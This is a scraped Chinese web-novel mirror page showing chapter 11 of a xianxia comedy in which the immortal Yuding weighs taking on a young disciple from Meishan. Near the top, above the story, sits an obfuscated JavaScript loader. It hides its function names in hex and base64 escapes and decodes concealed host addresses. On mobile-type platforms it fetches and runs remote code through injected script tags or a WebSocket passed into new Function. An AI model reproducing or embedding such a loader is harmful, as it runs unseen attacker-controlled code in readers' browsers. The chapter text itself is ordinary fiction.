笔趣阁

字:
关灯 护眼
笔趣阁 > 别让玉鼎再收徒了 > 第11章 原来真的看懂了
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第11章 原来真的看懂了

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
青云下山就见那白衣青年还跪在原地。
  白衣青年见到青云到来,不禁脸上笑容绽开:“仙童回来可是真人醒了?”
  青云瞧着他一脸着急的样子,心中一动卖了个关子,故意叹息一声。
  接着走过来,轻轻拍了拍青年的肩膀摇了摇头。
  那青年笑容一下凝住,失神道:“真人不……不见我么!”
  “哈,看把你给吓得。”
  青云绷不住,笑了:“算你运气不错,赶紧起来跟我上去见老爷。”
  “是!”
  青年转忧为喜,精神一振迅速起身。
  他跟着青云一路走来,但见这玉泉山中各处峰峦起伏,灵气浓郁非凡,奇花遍地,山中桥边瑶草喷香。
  各峰头不时响起锦鸡叫,空中时而传来仙鹤鸣,崖间玄猴白鹿随隐见,林中寿狐灵鸟任行藏。
  地上瑶草奇花终年不谢,山中青松翠柏四季长春。
  景色秀丽处秀丽,壮观处壮观,绝对是世间罕有的灵山福地。
  不多时两人来到金霞洞前,就见洞口有株灵桃树,树下有张藤椅,上面端坐着一个丰神俊秀超凡脱俗的神仙道人。
  白衣青年的神情有些激动起来。
  青云躬身一拜:“老爷,人带来了。”
  玉鼎看了眼青年眼中闪过一丝异色。
  这是他的杨戬徒儿吗?不像啊!
  毕竟传说中他那徒儿不仅神通广大,法力高强,关键颜值方面也和他这个师父一脉相承是三界有名的男神。
  眼前青年虽说看起来眉清目秀,但离美男子中间还差着很多吧。
  这时那青年直接拜倒,磕头道:“师父在上请受弟子一拜见!”
  “且慢!”
  玉鼎淡淡道:“别急着拜我,你是何方人士先说个清楚,再拜不迟。”
  那青年激动道:“弟子是大商国梅山人氏。”
  大商,梅山……
  这两个关键词使得玉鼎目光微微一凝。
  现如今洪荒到处都有人族分布,还有数不清的大小国度,但大商所在却是无可争议的人族祖地。
  因为曾经三皇五帝正是那个地方带着人族起家,所以大商也代表着人族的正统。
  玉泉山方圆也有一些人族小国,但修仙门派更多,以及还有许多隐世的仙人。
  因为神通尽失,所以就算玉鼎知道了三界局势,但却人族发展到哪里里却知道不多。
  这个年轻人倒是带来了一个重要信息。
  人族已到了大商朝,而那场卷天地人三界等诸多势力的封神大劫正是在大商王朝末年展开……
  玉鼎眉头一挑:“你说你是……梅山人氏?”
  巧得很,他正好知道,他的徒弟杨戬是灌江口人氏,既然身份信息和他的杨戬徒儿对不上那他当然不收了。
  反正收了也不会教……
  玉鼎开始思索该怎么婉拒这个年轻人,但同时又不会伤害孩子的自尊心。
  这时却听这年轻人诚恳道:“正是,弟子历经千山万水,无数艰难险阻才从梅山好不容易才寻到真人处。”
  “你……”
  玉鼎听到这番话,心中有些感慨。
  在这方世界虽然仙人多如狗,但想求个仙道的确不太容易。
  有些人以为修仙难在没有名师,殊不知拜了师父,得了法诀才只是一个开始。
  很多人说万事开头难,
  但是中间也难,后面更难。
  修炼时,打坐炼气积攒法力,这只是一个基础的水磨功夫,当遇到了瓶颈后被卡在关卡上到寿元耗尽都是常有的事。
  此外有白天就有黑夜,有生就有死。
  生死轮回,阴阳运转才是天地运行的规律与法则,而超脱生死这种事说是逆天而行也没错了。
  毕竟,当世上只有生没有死之后,会是一个什么样的局面?
  人满为患!
  可是空间、资源却是有限的,当空间和资源无法养活人之后争夺自然无法避免,三界也大乱。
  此外你真以为成仙了就很快乐吗?
  错了!
  神仙的快乐你想象不到。
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师